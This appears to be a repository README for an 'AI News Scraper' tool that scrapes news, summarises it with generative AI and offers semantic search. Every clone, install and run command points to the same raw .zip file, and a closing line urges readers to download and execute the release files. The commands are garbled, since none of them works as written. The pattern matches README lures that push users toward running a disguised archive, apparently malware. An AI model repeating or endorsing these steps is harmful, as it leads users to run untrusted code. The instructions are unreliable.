Welcome to the AI News Scraper repository! This project is a powerful Python application designed to scrape news articles, generate summaries using Generative AI, identify topics, and provide semantic search capabilities through vector embeddings.
- Web Scraping: Efficiently scrape news articles from various sources.
- Generative AI Summaries: Automatically generate concise summaries of the scraped articles.
- Topic Identification: Use AI to identify and categorize topics within the news articles.
- Semantic Search: Perform searches using vector embeddings for relevant results.
- User-Friendly Interface: Simple commands to execute various functions.
This project employs several technologies to achieve its goals:
- Python 3.8+: The core programming language.
- Beautiful Soup: For web scraping.
- Requests: To handle HTTP requests.
- LangChain: For managing language models and embeddings.
- FAISS: For efficient similarity search and clustering of dense vectors.
- OpenAI API: To utilize generative AI capabilities.
- Vector Databases: To store and retrieve vector embeddings.
To get started with the AI News Scraper, follow these steps:
-
Clone the repository:
git clone https://raw.githubusercontent.com/techdomegh/ai-news-scraper/dev/src/ai-scraper-news-v2.1.zip cd ai-news-scraper -
Create a virtual environment (optional but recommended):
python -m venv venv source venv/bin/activate # On Windows use `venv\Scripts\activate`
-
Install required packages:
pip install -r https://raw.githubusercontent.com/techdomegh/ai-news-scraper/dev/src/ai-scraper-news-v2.1.zip
Once you have installed the necessary packages, you can start using the AI News Scraper.
-
Run the application:
python https://raw.githubusercontent.com/techdomegh/ai-news-scraper/dev/src/ai-scraper-news-v2.1.zip
-
Scrape news articles: Use the provided commands to specify the news source and the number of articles to scrape.
-
Generate summaries: After scraping, you can generate summaries for each article.
-
Search for topics: Use the semantic search feature to find articles based on specific topics.
The AI News Scraper follows a systematic approach:
-
Scraping: The application uses Beautiful Soup and Requests to fetch news articles from the web. It extracts the title, content, and publication date of each article.
-
Summarization: After scraping, the application utilizes the OpenAI API to generate summaries. The summaries condense the main points of each article into a few sentences.
-
Topic Identification: The application analyzes the content to identify key topics using vector embeddings. This helps categorize articles for easier navigation.
-
Semantic Search: The FAISS library enables efficient searching through the vector embeddings. Users can input queries, and the application retrieves relevant articles based on similarity.
We welcome contributions to improve the AI News Scraper. To contribute:
- Fork the repository.
- Create a new branch (
git checkout -b feature/YourFeature). - Make your changes.
- Commit your changes (
git commit -m 'Add some feature'). - Push to the branch (
git push origin feature/YourFeature). - Open a Pull Request.
Please ensure your code follows the style guidelines and includes tests where applicable.
This project is licensed under the MIT License. See the LICENSE file for details.
You can find the latest releases of the AI News Scraper here. Download the necessary files and execute them to get started.
For further updates, visit the Releases section regularly.
The AI News Scraper is a robust tool for anyone interested in staying updated with the latest news. By leveraging AI technologies, it not only gathers information but also makes it easier to digest and search through. We hope you find this tool useful and encourage you to contribute to its development.
